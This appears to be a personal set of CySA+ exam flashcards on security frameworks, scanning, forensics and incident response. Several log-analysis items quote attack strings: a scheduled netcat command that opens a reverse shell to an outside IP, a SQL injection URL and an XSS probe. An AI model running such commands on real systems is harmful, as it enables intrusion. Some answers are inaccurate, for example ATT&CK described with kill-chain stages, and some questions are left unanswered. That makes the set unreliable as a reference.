CySA+ Flashcards
Vulnerability scan output: CVE-2011-3389
QID 42366 - SSLv3.0/TLSv1.0 protocol weak CBC mode server-side vulnerability. Check with: openssl s_client -connect login.diontraining.com:443 -tls -cipher "AES:CAMELLIA:SEED:3DES:DES"
What category should this be classified as?
Web application cryptography vulnerability
You're an analyst for a bank with offices in multiple states. You want to create an alert to detect if an employee from one bank office logs into a workstation in an office in another state. What type of detection and analysis are you configuring?
Behavior-based
You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security software recommends you should remediate this. What should you do?
Change all devices and servers that support it to 636 because encrypted services run by default on 636
Your org has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what KPI (key performance indicator) could you use?
Alert volume: an increase may correlate with an increase of detected incidents
What tools can be used to conduct a banner grab from a web server on a remote host?
netcat, wget, and telnet
(ftp can’t do it)
A recent vulnerability scan found several vulnerabilities on an organization's public-facing IP address. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?
-A cryptographically weak cipher
-An HTTP response that reveals an internal IP address
-A website utilizing a self-signed SSL cert
*A buffer overflow that is known to allow remote code execution
An adversary compromised a web server in your network using a zero-day exploit and then uses it as a C2 server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate?
Command and Control (C2)
Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill chain?
Diamond Model of Intrusion Analysis
Which framework provides the most explicit detail regarding how to mitigate or detect a given threat?
MITRE ATT&CK
According to the Center for Internet Security's system design recommendations, which control category would contain info on the best security practices to implement within the SDLC?
Application Software Security
A cybersecurity analyst has received an alert that sensors continuously observe well-known call-home messages at their network boundary. Still, the org's proxy firewall is properly configured to successfully drop the messages before they leave the network. What is the most likely cause of the messages being sent?
An infected workstation is attempting to reach a C2 server
You’re investigating traffic involving 3 separate IP addresses (192.168.66.6, 10.66.6.10, 172.16.66.1). What REGEX expression would you use to be able to capture ONLY these 3 IP addresses?
\b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b
You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan but you don't have raw socket privileges on your workstation. What command should you use to conduct the scan from your workstation?
nmap -sT
Nicole’s org doesn’t have the budget for 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. What service provider would be best suited for this?
MSSP: Managed Security Service Provider
A company's CIO is concerned about the liability of a security vulnerability being exploited in their self-driving car where someone may die. What methodology would provide the single greatest mitigation if successfully implemented?
Formal methods of verification
What provides a standard nomenclature for describing security-related software flaws?
CVE
You suspect a system's firmware has been compromised. What type of firmware would provide resistance against such an attack?
Trusted Firmware
What REGEX expression would provide the appropriate output when searching logs from only the IP subnet 172.161.1.224/26?
\b172.161.1.(2[0-4][0-9]|25[0-5]|19[2-9])\b
What is least likely to be included in a data retention policy?
Classification Info
As a forensic analyst, what should you collect first?
L3 cache (CPU registers), RAM cache (system memory), SSD (storage devices), backup drives
Your company is adopting a cloud first architecture model. Management wants to decommission the on-prem SIEM and migrate it to the cloud. What issues could arise?
Legal and regulatory issues may prevent data migration to the cloud
Diamond Model of Intrusion Analysis
Framework for understanding the 4 key elements of cyber attacks. Adversary, victim, infrastructure, capability
MITRE ATT&CK
Framework detailing tactics, techniques, and procedures.
Reconnaissance · Weaponization · Delivery · Exploitation · Installation · Command & Control (C2) · Actions on Objectives
OWASP Testing Guide
Methodology for testing web application security
Cyber Kill Chain
Describes the stages of a cyber attack. Makes no allowances for an adversarial retreat
What secure coding practice ensures a character like < is translated into the &lt; string when written to an HTML page?
Output Encoding
You are a cyber analyst at a privately owned bank. Which regulation would have the greatest impact on your bank's cybersecurity program?
GLBA
Gramm-Leach-Bliley Act
Federal law explaining how to protect customers' private info
Root Cause Analysis
Involves investigating an incident to determine its origin and how it unfolded, with an aim of preventing similar incidents
Forensic Analysis
Thorough investigation whose focus is broader and often includes legal implications
What can prevent firmware downgrades?
eFuse
Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip
You see the following log entry. What is it and how do you stop it?
sc config schedule start auto
net start schedule
at 10:42 "c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe"
The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp folder to create a remote connection to 123.12.34.12
You should recommend removing the host from the network
What technique would provide the largest increase in security on a network with ICS, SCADA, and IOT devices?
User and entity behavior analytics
tcpdump
Primarily used for capturing and analyzing network packets
Faster than Wireshark
No GUI
What sanitization technique removes data by overwriting a hard drive with random 1s and 0s?
Clear
Which part in a federation provides services to members of the federation?
RP: Relying Party
IdP
Identity Provider
Provides identities, makes assertions about those identities and releases info about identity holders
SAML
Security Assertion Markup Language
Open standard for exchanging authentication & authorization data between parties, such as between an IdP and an SP
SSO
Single Sign On
Authentication scheme that allows users to log in with a single ID and password to related but independent software systems across a federation
What technique is most likely to identify a buffer overflow vulnerability in an app during development?
Static code analysis
You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence?
/etc/xinetd.conf
newer versions: systemctl
According to the MITRE ATT&CK framework, what capability can identify and exploit a zero-day vulnerability?
Developed
What type of solution would you classify an FPGA?
Anti-tamper
Field-Programmable Gate Array
WannaCry’s use of Eternal Blue represents which phase of the Cyber Kill Chain?
Weaponization
What is the most widely used web-application scanner?
ZAP
OWASP Zed Attack Proxy
What are 3 Infrastructure vulnerability scanners?
Qualys, OpenVAS, Nessus
What type of file is commonly used to store configuration settings for a macOS system?
plists
(property lists)
During a vulnerability scan you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on that info what do you suspect is true?
You scanned a CDN-hosted version of the site.
CDN: Content Delivery Network
Geographically distributed network of proxy servers
What is the proper order of the UEFI boot phases?
Security
Pre-EFI initialization
Driver Execution Environment
Boot Device Select
Transient System Load
Runtime
What proprietary tool is used to create forensic disk images without making changes to the original evidence?
FTK Imager
Memdump
Used to collect content within RAM on a given host
Autopsy
Open-source forensic tool suite
Which role validates the user’s identity when using SAML for authentication?
IdP
You need to sanitize hard drives from some leased workstations before returning them to a supplier. The hard drives contained sensitive data. What is the most appropriate process to ensure that data exposure doesn't occur during this process?
Purge, validate, and document the sanitization of the drives
What technology can be used to ensure that users who log into a network are physically in the same building as the network they are attempting to authenticate on?
GPS location and NAC
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework?
Technical architecture
Dion Training wants to implement tech within their corporate network to BEST mitigate risk that a zero-day virus might infect their workstations. What should be implemented FIRST?
Application Whitelisting
You conduct a vulnerability scan of a data center and notice that a management interface for a virtualization platform is exposed to your vulnerability scanner. What network should the hypervisor's management interface be exposed to, to ensure the best security of the virtualization platform?
Management Network
You have just returned from a business trip from a country with a high intellectual property theft rate. What precautions should you take before reconnecting your laptop to your corporate network?
Scan for malware
Physically inspect the laptop and compare it with images made before you left
You are trying to find some files deleted by a user on a Windows workstation. What 2 locations are most likely to contain the deleted files?
Recycle Bin
Slack Space
What does the Infrastructure component of the Diamond Model refer to?
The physical or virtual resources used by the adversary (e.g., phishing infrastructure)
Persistence
MITRE ATT&CK framework
Stage that describes how the adversary maintains a foothold in the network
Command and Control
MITRE ATT&CK framework
Represents the communication channel
You want to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS?
DNS Blackholing
Uses a list of known domains/IPs belonging to malicious hosts and uses an internal DNS server to create a fake reply
An org wants to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. What protocol should you use?
Kerberos
An analyst suspects that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed from?
which bash
SCAP
Security Content Automation Protocol
Multi-purpose framework of specifications supporting automated configuration, vulnerability, and patch checking, tech control compliance activities, and security measurement
Security Onion
Free open-source Linux distro for intrusion detection, enterprise security monitoring, and log management
What utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?
Infrastructure as Code (IaC)
A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. What are 3 means of unlocking the volume?
Extract the keys from iCloud
Retrieve the key from memory while the volume is mounted
Obtain the recovery key
You're a security admin and need to respond to an ongoing spear-phishing campaign against your org. What should be used as a checklist of actions to perform to detect and respond to this particular incident?
Playbook
A runbook is an automated response
Input validation can prevent what vulnerabilities?
SQL Injection
Cross-Site Scripting
XML Injection
Directory Traversal
What is the lowest layer of a bare-metal virtualization environment?
The physical hardware
What type of vulnerability scan would provide the best results if you want to determine if the target’s configuration settings are correct?
Credentialed Scan
Non-Credentialed Scan
Vulnerability scan that relies on external resources for configuration settings, which can be incorrect or altered
If you want to conduct an operating system identification during an nmap scan, what syntax should you use?
nmap -O
You need to verify the installation of a critical Windows patch on your org’s workstations. What method would be the most efficient to validate the current patch status for all Windows 10 workstations?
Use SCCM to validate patch status
Microsoft’s System Center Configuration Manager
You review a Python script used in your org's automation process. You notice the following line of code: os.system('rm -rfl'). What potential security concern does the code represent?
Command Injection
Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the OS can load itself?
Measured Boot
If you post too much on social media like name, DOB, hometown,… it is easier for an attacker to conduct what type of attack?
Cognitive Password Attack
What authentication protocol was developed by Cisco to provide authentication, authorization, and accounting services?
TACACS+
Terminal Access Controller Access-Control System
What type of encryption would ensure the best security of a website?
TLS
You review the logs of a proxy server and saw the following URL: http://test.diontraining.com/index/php?id=1%20OR%2017-7%3d10
What type of attack has likely occurred?
SQL Injection
A pentester is conducting an assessment of a wireless network that is secured using WPA2 Enterprise encryption. What are the 2 major differences between conducting reconnaissance of a wireless network vs a wired one?
Physical accessibility and Encryption
Management is concerned about rogue devices being attached to the network. What solutions would quickly provide the most accurate info that could be used to identify rogue devices on the network?
Router and Switch-based MAC address reporting
What automatically combines multiple disparate sources of info to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?
Data Enrichment
You’re about to conduct forensics on a virtual machine. What process should be used to ensure that all of the data is acquired forensically?
Suspend the machine and copy the contents of the directory it resides in
What will an adversary do during the exploitation phase of the Lockheed Martin kill chain?
Take advantage of a software, hardware, or human vulnerability
Wait for a user to click on a malicious link
Wait for a malicious email attachment to be opened
When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?
OWASP Testing Guide
Where should a forensic analyst search to find a list of the wireless networks that a laptop has previously connected to with a company-owned laptop?
Search the registry
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise?
Segmentation
Disable unused services
What are 3 concerns when migrating to a serverless architecture?
Protection of endpoint security
Dependency on the cloud service provider
Limited disaster recovery options
A cyber analyst is reviewing the logs of a proxy server and saw the following URL: https://www.google.com/search?q=password+filetype%3xls+site%3Adiontraining.com&pws=0&filter=p.
What is true about the results of this search?
Personalization is turned off (pws=0; & separates the query parameters)
Returns only files hosted at diontraining.com (site%3Adiontraining.com; %3A is the hex code for ':')
Returns only Microsoft Excel spreadsheets (q=password and filetype%3Axls; + separates the search terms, limiting results to pages containing "password" with filetype equal to xls)
Which type of digital forensic investigation is most challenging due to the on-demand nature of the analyzed assets?
Cloud services
Your company has announced a change to an “API first” model of software development. As a cyber analyst you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. What is the primary basis for an attack against this vulnerability?
Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
What does a User Agent request a resource from when conducting a SAML transaction?
SP (Service Provider)
Your company has just enabled key-based authentication on its SSH server. What action should be performed to secure the SSH server?
Disable password authentication for SSH
You are creating a script to filter some logs so that you can detect any suspected malware beaconing. What are some typical means of identifying a malware beacon's behavior on the network?
The beaconing interval
The beacon’s persistence
The removal of known traffic
Policy
Contains procedures and guidelines covering appropriate priorities, actions, and responsibilities in the event of a security incident
Procedure
Provide detailed, tactical info for the CSIRT to respond to an incident
What method should a cyber analyst use to locate any instances on the network where passwords are being sent in cleartext?
Full packet capture
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Your network has several different OSs in use but you only have 1 machine available to test the patches. What is the best environment to use to perform the testing of the patches before deployment?
Virtualization
In the Colonial Pipeline ransomware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent?
Actions on Objectives
Lockheed Martin Kill Chain Stages
Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command & Control (C2)
Actions on Objectives
In the Cyber Kill Chain, at which stage does an attacker deliver the actual working part of the attack?
Exploitation
Exploitation - attacker leverages a vulnerability to execute the main part of the attack
Weaponization - attacker creates the malicious payload, does not deliver it
Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which compensating control should be recommended until the system can be remediated?
A. Vulnerability scanning
B. Encryption
C. WAF
D. IPS
C. WAF
A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com
Which is true about the results of the search?
A. Returns all web pages containing an email address affiliated with diontraining.com
B. Returns all web pages containing the text diontraining.com
C. Returns all web pages hosted at diontraining.com
D. Returns no useful results
A. Returns all web pages containing an email address affiliated with diontraining.com
%40 is the hex code for @
The 2018 Drupalgeddon2 incident saw hackers actively exploiting a highly critical vulnerability (CVE-2018-7600) in Drupal content management system. Which versions of Drupal’s security patch would have remediated this?
A. Drupal 7.56/8.3.4
B. Drupal 7.54/8.2.7
C. Drupal 7.57/8.4.5
D. Drupal 7.58/8.5.1
D. Drupal 7.58/8.5.1
Which of the following functions is not provided by TPM?
A. User authentication
B. Random number generation
C. Sealing
D. Remote attestation
E. Binding
F. Secure Generation of cryptographic keys
A. User authentication
Which of the following is NOT a host-related indicator of compromise?
A. Memory Consumption
B. Beaconing
C. Processor Consumption
D. Drive Capacity Consumption
B. Beaconing
Beaconing is considered a network-related IoC
A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients: ]>&abc;
Based on the output, which is true?
A. The application is using parameterized queries to prevent XML injections
B. An XML External Entity (XXE) vulnerability has been exploited and it's possible that the file "/etc/passwd" has been downloaded.
C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used
D. There is no concern since “/etc/passwd” does not contain any system passwords
B. An XML External Entity (XXE) vulnerability has been exploited and it's possible that the file "/etc/passwd" has been downloaded.
Which of the following are the two most important factors when determining a containment strategy?
A. Preservation of evidence
B. Identification of whether the intrusion is the primary attack or a secondary one
C. Prevention of an ongoing intrusion or data breach
D. Avoidance of alerting the attacker that they have been discovered
E. Ensuring the safety and security of all personnel
C & E
You’re a cybersecurity analyst who has been given the output from a system administrator’s Linux terminal. Based on the output, which of the following is true?
---- BEGIN OUTPUT ----
# nmap win2k16.local
Nmap scan report for win2k (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
# nc win2k16.local 80
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)
# nc win2k16.local 22
SSH-2.0-OpenSSH_7.2 Debian-2
---- END OUTPUT ----
A. Your org has a vulnerable version of the SSH server software installed
B. Your email server has been compromised
C. Your email server is running on a non-standard port
D. Your web server has been compromised
C. Your email server is running on a non-standard port.
Output shows SMTP is running on port 80 and the standard port is 25.
A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following should be performed to minimize the concern?
A. Scan and patch the device
B. Automatic Updates
C. Configuration management
D. Vulnerability scanning
D. Vulnerability scanning
Dion Training is concerned with the possibility of employees accessing another user’s workstation in secured areas without their permission. Which would BEST prevent this from happening?
A. Install security cameras in secure areas to monitor logins
B. Require biometric identification for user logins
C. Require username and password for user logins
D. Enforce a policy that requires passwords to be changed every 30 days
B. Require biometric identification for user logins
Your company has just finished replacing all of its computers with brand new workstations. A coworker asks the company if she can have the old computers that are about to be thrown away so she can refurbish them by reinstalling a new OS and donate them. The owner thinks it's a great idea but is concerned about the sensitive info on the drives. What is the best solution to sanitize or destroy the data while ensuring the computers will still be usable?
A. Purging
B. Shredding
C. Degaussing
D. Wiping
D. Wiping
Can't reuse a hard drive once it has been degaussed.
Generally can't reuse after purging.
Which term is used in software development to refer to the method in which app and platform updates are committed to a production environment rapidly?
A. Continuous integration
B. Continuous monitoring
C. Continuous deployment
D. Continuous delivery
C. Continuous deployment
A major cyber incident has occurred at your org. As part of the incident response team you have been tasked with analyzing the incident, including who caused it, what systems were affected, when it occurred, where it originated from, and why it happened. What kind of report are you preparing?
A. Incident declaration report
B. Incident response report
C. Regulatory reporting
D. Root cause analysis report
B. Incident response report
The security team from Kelly Nexis Analytics has detected the Apache Log4j vulnerability in JIRA. What is a practical method for the team to eliminate this vulnerability?
A. Patching
B. Antivirus Software
C. Virtual Private Network
D. Firewall Implementation
A. Patching
Which of the following vulnerability scanning tools would be used to conduct a web application vulnerability assessment?
A. OpenVAS
B. Nessus
C. Nikto
D. Qualys
C. Nikto
Which of the following has occurred if a device fails to activate because it has detected an unknown modification?
A. Improper authentication
B. Obfuscation
C. Self-checking
D. Failed trust foundry
C. Self-checking
Which of the following is a technique used in Secure Disposal?
A. Zero-fill
B. Degaussing
C. Erasing
D. Clearing
B. Degaussing
Clearing does not destroy
An SNMP sweep is being conducted but the sweep received no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst?
A. The community string being used is invalid
B. Any listed answers may be true
C. The machines are not running SNMP servers
D. The machines are unreachable
B. Any listed answers may be true
Dion consulting group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer’s team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend implementing first?
A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game
B. Ensure that all screen capture content is visibly watermarked
C. Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console
D. Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute
A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game
Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?
A. NetFlow
B. SNMP
C. MIB
D. SMTP
B. SNMP (Simple Network Management Protocol)
Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution?
A. Kerberos
B. ADFS
C. OpenID Connect
D. SAML
C. OpenID Connect
What type of information will a Cisco switch log when configured to capture logs at level 7?
A. Emergencies
B. Warnings
C. Debugging
D. Errors
C. Debugging
0 - Emergencies
A vulnerability scan has returned the following:
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified - 8.30.2017
Enumeration Results:
print$  c:\windows\system32\spool\drivers
files   c:\FileShare\Accounting
Temp    c:\temp
What best describes the output?
A. There is no CVE present, so this is a false positive caused by Apache running on a Windows server
B. There is an unknown bug in an Apache server with no Bugtraq ID
C. Windows Defender has a known exploit that must be resolved or patched
D. Connecting to the host using a null session allows enumeration of the share names on the host
D. Connecting to the host using a null session allows enumeration of the share names on the host
Your org is transitioning to a cloud environment and wants to ensure its new infrastructure is secure. What tool could you utilize to assess the security of your cloud infrastructure?
A. Pacu
B. Nmap
C. Nessus
D. Burp Suite
A. Pacu
This is designed for AWS environments.
Nessus is not specifically designed for cloud infrastructure assessments
You are conducting an incident response and want to determine if any account-based IoCs exist in a compromised server. Which of the following would you NOT search for on the server?
A. Unauthorized sessions
B. Malicious processes
C. Off-hours usage
D. Failed logins
B. Malicious processes
A malicious process is a host-based IoC and not directly associated with an account-based IoC
Which of the following actions should you perform during the post-incident activities of an incident response?
A. Create an incident summary reporting with in-depth technical recommendations for future resourcing and budgeting
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
C. Ensure confidentiality of the lessons learned report by not sharing it beyond the incident response team who handled the investigation
D. Sanitize storage devices that contain any dd images collected to prevent liability arising from evidence collection
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain numbers in format of a social security number. Which of the following concepts within DLP is being utilized?
A. Classification
B. Statistical matching
C. Document matching
D. Exact data match
D. Exact data match
What port does LDAP run on?
389
Your org has just migrated to provisioning its corporate desktops as virtual machines and accessing them using thin clients. The org believes this will enhance security since the desktop can be rewritten with a new baseline image every time the user logs into it. Based on this scenario, which technology has the organization adopted?
A. VPC
B. UEBA
C. VPN
D. VDI
D. VDI
VDI = Virtual Desktop Infrastructure
VPC = Virtual Private Cloud
UEBA = User and Entity Behavior Analytics
Which of the following is not normally part of an endpoint security suite?
A. IPS
B. Software firewall
C. VPN
D. Anti-virus
C. VPN
Natalie wants to create a backup of the permissions before making changes to the Linux workstation she will remediate. What Linux tool can she use to back up the permissions of the system’s complete directory structure?
A. iptables
B. chbkup
C. getfacl
D. aclman
C. getfacl
aclman and chbkup are not legitimate commands
iptables is used to configure the firewall
During a simulated attack on your org’s network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent?
A. MITRE ATT&CK
B. OWASP Testing Guide
C. Cyber Kill Chain
D. Diamond Model of Intrusion Analysis
C. Cyber Kill Chain
Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a pen test?
A. Denial-of-service Attack
B. Physical Penetration Attempts
C. Reverse Engineering
D. Social Engineering
A. Denial-of-service Attack
You have been given access to a Windows system located on an Active Directory domain as part of a white box pen test. Which of the following commands would provide information about the other systems on this network?
A. net group
B. net use
C. net config
D. net user
B. net use
net group is only used on DCs
net user would show accounts
net config allows the server and workstation services to be controlled once identified
During a port scan you discovered a service running on a registered port. Based on this, what do you know about this service?
A. The service is running on a port between 0-1023
B. The service’s name on the registered port
C. The service is running on a port between 1024 - 49151
D. The vulnerability status of the service on the registered port
C. The service is running on a port between 1024-49151
Which of the following categories of controls are firewalls, IDS, and a RADIUS server classified as?
A. Administrative Controls
B. Technical Controls
C. Physical Controls
D. Compensating Controls
B. Technical Controls
You just finished conducting a remote scan of a class C network block using the following command ‘nmap -sS 202.15.73.0/24’. The results only showed a single web server. Which of the following techniques would allow you to gather additional info about the network?
A. Use an IPS evasion technique
B. Scan using the -p 1-65535 flag
C. Use a UDP scan
D. Perform a scan from on-site
D. Perform a scan from on-site
Which tool should a malware analyst utilize to track the registry’s changes and the file system while running a suspicious executable on a Windows system?
A. ProcDump
B. Autoruns
C. Process Monitor
D. DiskMon
C. Process Monitor
Autoruns shows what programs are configured to run during bootup or login
What is a reverse proxy commonly used for?
A. Directing traffic to internal services if the contents of the traffic comply with the policy
B. Allowing access to a virtual private cloud
C. To prevent unauthorized use of cloud services from the local network
D. To obfuscate the origin of a user within a network
A. Directing traffic to internal services if the contents of the traffic comply with the policy
During which incident response phase is the preservation of evidence performed?
A. Detection and analysis
B. Containment, eradication, and recovery
C. Preparation
D. Post-incident activity
B. Containment, eradication, and recovery
During a recent security incident, you, as an incident responder, documented each action and decision that took place, from the initial detection to final remediation. This detailed timeline could prove particularly useful for which part of the incident response reporting?
A. Impact
B. Executive summary
C. Lessons learned
D. Scope
C. Lessons learned
You’re analyzing the logs of a web server and see the following:
192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] “Get /%27%27;!-%22%3CDION%3E=&{()}
HTTP/1.1” 404 310 “-“ “Mozilla/5.0 (X11; Linux x86_64; en-US; rv:1.9.0.12)Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12”
Based on this, which following attack was attempted?
A. XML injection
B. Buffer overflow
C. SQL injection
D. XSS
D. XSS
The attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘).
You are analyzing DNS logs looking for indicators of compromise associated with the use of a fast-flux network. You are already aware that the names involved in this particular fast-flux network are longer than 50 characters and always end in a .org top-level domain. Which of the following REGEX expressions would you use to filter DNS traffic that matches this?
A. \b[A-Za-z0-9.-]{50,251}+.org
B. \b[A-Za-z0-9.-]{50,251}+.org
C. \b[A-Za-z0-9.-]{50,251}+.org
D. \b(A-Za-z0-9.-){50,251}|.org
A. \b[A-Za-z0-9.-]{50,251}+.org
+ means it matches between 50 and 251 instances of any of the preceding letters (A-Z, a-z, 0-9, period, and the minus symbol)
During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony's systems to erase data. Which phase of the Cyber Kill Chain does this represent?
A. Delivery
B. Installation
C. Reconnaissance
D. Actions and Objectives
B. Installation
A penetration tester is using a known vulnerability to compromise an Apache web server. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ?
A. Vulnerability scanning
B. Patching
C. Privilege escalation
D. Installing additional tools
C. Privilege escalation
A cybersecurity analyst is reviewing the DNS logs for his company's networks and sees the following:
$ cat dns.log | bro-cut query
gu2m9qhychvxrvh0eift.com
oxboxkgtyx9veimcuyri.com
4f3mvgt0ah6mz92frsmo.com
asvi6d6ogplqyfhrn0p7.com
5qlark642x5jbissjm86.com
Based on this potential IoC, which of the following hypotheses should you make to begin threat hunting?
A. The DNS server is running out of memory due to a memory resource exhaustion attack
B. Data exfiltration is being attempted by an APT
C. Fast flux DNS is being used for an attacker’s C2
D. The DNS server’s hard drive is being used as a staging location for a data exfiltration
C. Fast flux DNS is being used for an attacker’s C2
After a successful spear-phishing attack, an adversary has gained access to your organization's network. The adversary then performs a Pass-the-Hash attack to gain administrative privileges, moves horizontally in the network, and finally exfiltrates sensitive data. What stage of the MITRE ATT&CK framework does this movement represent?
A. Lateral Movement
B. Exfiltration
C. Initial Access
D. Credential Access
A. Lateral Movement
You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it?
A. sc
B. wmic
C. services.msc
D. secpol.msc
D. secpol.msc
secpol.msc = security policy auditor
In the preparation phase of the incident management life cycle, which aspect involves assembling and maintaining a collection of scripts, applications, and other software that can be used to respond to a cyber threat effectively?
A. Incident response plan
B. Business continuity disaster recovery
C. Tools
D. Playbooks
C. Tools
Evaluate the following log entry:
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0
Based on this, which statements are true?
A. MAC filtering is enabled on the firewall
B. Packets are being blocked inbound to and outbound from the network
C. The packet was blocked outbound from the network
D. An attempted connection to the ssh service was prevented
E. The packet was blocked inbound to the network
F. An attempted connection to the telnet service was prevented
E. The packet was blocked inbound to the network
F. An attempted connection to the telnet service was prevented
When assessing risks to your organization’s IT infrastructure, which framework allows for prioritization based on the potential impact of threats?
A. ISO 31000
B. OWASP Top 10
C. NIST’s Cybersecurity Framework
D. Center for Internet Security (CIS) Top 20 Critical Security Controls
C. NIST’s Cybersecurity Framework
A cybersecurity analyst is working at a college that wants to increase its network’s security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?
A. Combination of server-based and agent-based scanning engines
B. Passive scanning engine located at the core of the network infrastructure
C. Combination of cloud-based and server-based scanning engines
D. Active scanning engine installed on the enterprise console
D. Active scanning engine installed on the enterprise console
You have been hired to investigate a possible insider threat from a user named Terri. Which of the following commands would successfully look through all the log files in '/var/log' for any references to "Terri" or "terri" on a Linux server?
A. find /var/log/ -exec grep -H -e "'terri' OR 'Terri'" {} \; 2> /dev/null
B. find /var/log/ -name .log -exec grep -H -e "'Terri' OR 'terri'" {} \; 2>/dev/null
C. find /var/log/ -exec grep -H -e "[Tt]erri" {} \; 2> /dev/null
D. find /var/log/ -name ".log" -exec grep -H -e "[Tt]erri" {} \; 2>/dev/null
C. find /var/log/ -exec grep -H -e "[Tt]erri" {} \; 2> /dev/null
Ted, a file server admin, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted contacts his company's security analyst, who verifies that the workstation's anti-malware solution is up-to-date and the network's firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation?
A. Session hijacking
B. Zero-day
C. MAC spoofing
D. Impersonation
B. Zero-day
You are conducting a code review of a program and observe that the calculation 0xffffffff+1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program?
A. Password spraying
B. Integer overflow attack
C. Impersonation
D. SQL injection
B. Integer overflow attack
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement?
A. \b[192.168.66.6]+[10.66.6.10]+[172.16.66.1]\b
B. \b(192.168.66.6)+(10.66.6.10)+(172.16.66.1)\b
C. \b[192.168.66.6]|[10.66.6.10]|[172.16.66.1]\b
D. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b
A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following:
$ tcpdump -n -i eth0
15:01:35.170763 IP 10.0.19.121.52497>11.154.12.121.ssh: P 105:157(52) ack 1806 win 16549
15:01:35.170776 IP 11.154.12.121.ssh>10.0.19.121.52397: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh>10.0.19.121.52497: P 24136:24380(244) ack 157 win 113
Which statement is true?
A. 11.154.12.121 is under attack from a host at 10.0.19.121
B. 11.154.12.121 is a client that is accessing an SSH server over port 52497
C. 10.0.19.121 is a client that is accessing an SSH server over port 52497
